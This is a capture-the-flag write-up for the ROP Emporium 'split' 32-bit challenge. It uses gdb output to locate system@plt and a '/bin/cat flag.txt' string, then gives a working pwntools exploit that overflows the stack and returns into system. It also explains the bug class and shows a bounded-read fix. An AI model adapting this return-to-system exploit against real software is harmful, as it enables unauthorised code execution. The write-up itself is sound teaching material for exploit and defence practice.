ROP Emporium split (32bit)

ROP Emporium
A site for practicing ROP.
It was updated in July 2020 and a lot seems to have changed.

split (32bit)


$ ./split32 
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaa
Thank you!

Exiting
$ ./split32 
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault

Let's analyze it with gdb.

$ gdb ./split32
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x08048374  _init
0x080483b0  read@plt
0x080483c0  printf@plt
0x080483d0  puts@plt
0x080483e0  system@plt
0x080483f0  __libc_start_main@plt
0x08048400  setvbuf@plt
0x08048410  memset@plt
0x08048420  __gmon_start__@plt
0x08048430  _start
0x08048470  _dl_relocate_static_pie
0x08048480  __x86.get_pc_thunk.bx
0x08048490  deregister_tm_clones
0x080484d0  register_tm_clones
0x08048510  __do_global_dtors_aux
0x08048540  frame_dummy
0x08048546  main
0x080485ad  pwnme
0x0804860c  usefulFunction
0x08048630  __libc_csu_init
0x08048690  __libc_c

Let's look at usefulFunction.

gdb-peda$ disas usefulFunction 
Dump of assembler code for function usefulFunction:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     sub    esp,0x8
   0x08048612 <+6>:     sub    esp,0xc
   0x08048615 <+9>:     push   0x804870e
   0x0804861a <+14>:    call   0x80483e0 <system@plt>
   0x0804861f <+19>:    add    esp,0x10
   0x08048622 <+22>:    nop
   0x08048623 <+23>:    leave  
   0x08048624 <+24>:    ret    
End of assembler dump.
gdb-peda$ x/s 0x804870e
0x804870e:      "/bin/ls"

It just calls system("/bin/ls").
Let's check the other symbols.

gdb-peda$ i var
All defined variables:

Non-debugging symbols:
0x080486a8  _fp_hw
0x080486ac  _IO_stdin_used
0x08048718  __GNU_EH_FRAME_HDR
0x08048894  __FRAME_END__
0x08049f0c  __frame_dummy_init_array_entry
0x08049f0c  __init_array_start
0x08049f10  __do_global_dtors_aux_fini_array_entry
0x08049f10  __init_array_end
0x08049f14  _DYNAMIC
0x0804a000  _GLOBAL_OFFSET_TABLE_
0x0804a028  __data_start
0x0804a028  data_start
0x0804a02c  __dso_handle
0x0804a030  usefulString
0x0804a042  __bss_start
0x0804a042  _edata
0x0804a044  __TMC_END__
0x0804a044  stdout
0x0804a044  stdout@@GLIBC_2.0
0x0804a048  completed
0x0804a04c  _end

Let's look at usefulString.

gdb-peda$ x/s 0x0804a030
0x804a030 <usefulString>:       "/bin/cat flag.txt"

A string we can use.
main and pwnme are the same as in ret2win. A buffer overflow occurs in pwnme. The offset is 44.
So we overwrite the return address and call system("/bin/cat flag.txt"). Since this is 32-bit cdecl, the slot right after system@plt is the return address system would go back to (filler here), and the argument comes after that.

+--------------------+
|        AAAA        |
+--------------------+
|     system@plt     |
+--------------------+
|        BBBB        |
+--------------------+
|    usefulString    |
+--------------------+
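The chain in the diagram depends on pwnme copying more input than its stack buffer holds. The C below is an added illustration, not the challenge's own source (which this writeup does not show): read_line_unsafe mirrors the unbounded-copy pattern, and read_line_safe is the bounded form that reports truncation instead of overwriting the saved return address. The function names, the 32-byte buffer size and the sample input are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32   /* assumed buffer size; the real pwnme layout is not shown here */

/* Bug class behind the chain: `len` caller-controlled bytes are copied into a
 * fixed stack buffer with no bound. When len > BUF_SIZE the saved EBP and the
 * return address that sit above `buf` are overwritten, which is what lets the
 * payload in this writeup redirect execution. Shown only for contrast; it is
 * never called with an oversized length below. Returns the bytes copied. */
size_t read_line_unsafe(const unsigned char *src, size_t len) {
    unsigned char buf[BUF_SIZE];
    memcpy(buf, src, len);                 /* no bound check: stack smash if len > BUF_SIZE */
    return len;
}

/* Hardened form: copy at most BUF_SIZE-1 bytes, always NUL-terminate, and
 * report truncation so the caller can reject the input instead of carrying on
 * with silently clipped data. Returns the number of bytes kept. */
size_t read_line_safe(const unsigned char *src, size_t len, int *truncated) {
    unsigned char buf[BUF_SIZE];
    size_t keep = (len < BUF_SIZE - 1) ? len : BUF_SIZE - 1;
    memcpy(buf, src, keep);
    buf[keep] = '\0';
    *truncated = (len > keep);
    return keep;
}

/* Constructed sample input: n bytes of 'a', like the two runs in the transcript
 * above (4 bytes succeeds, 50 bytes crashed the real binary). */
size_t demo_safe(size_t n, int *truncated) {
    unsigned char input[128];
    if (n > sizeof input) n = sizeof input;
    memset(input, 'a', n);
    return read_line_safe(input, n, truncated);
}

int main(void) {
    int truncated = 0;
    size_t kept = demo_safe(50, &truncated);
    printf("50 bytes in: kept %zu, truncated=%d\n", kept, truncated);
    kept = demo_safe(4, &truncated);
    printf("4 bytes in: kept %zu, truncated=%d\n", kept, truncated);
    return 0;
}
```

Two things the gdb output shows are also why this chain needs no information leak: every address is fixed at 0x0804xxxx (a non-PIE binary) and system is already imported, so the payload can name system@plt and usefulString directly. A PIE build would force a leak first, a stack canary would abort on the overwrite before ret, and the bounded read above removes the overwrite itself.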

I wrote a script (though I don't think it's needed this time either).

from pwn import *

p = process('./split32')
e = ELF('./split32')

plt_system = e.plt['system']              # system@plt (0x080483e0 above)
usefulString = e.symbols['usefulString']  # "/bin/cat flag.txt" (0x0804a030 above)

payload = b'A' * 44           # padding up to the saved return address (offset 44)
payload += p32(plt_system)    # return into system@plt
payload += b'BBBB'            # fake return address for system (cdecl)
payload += p32(usefulString)  # first argument: pointer to the string

p.recv()                      # consume the banner and the "> " prompt
p.sendline(payload)
print(p.recvall().decode())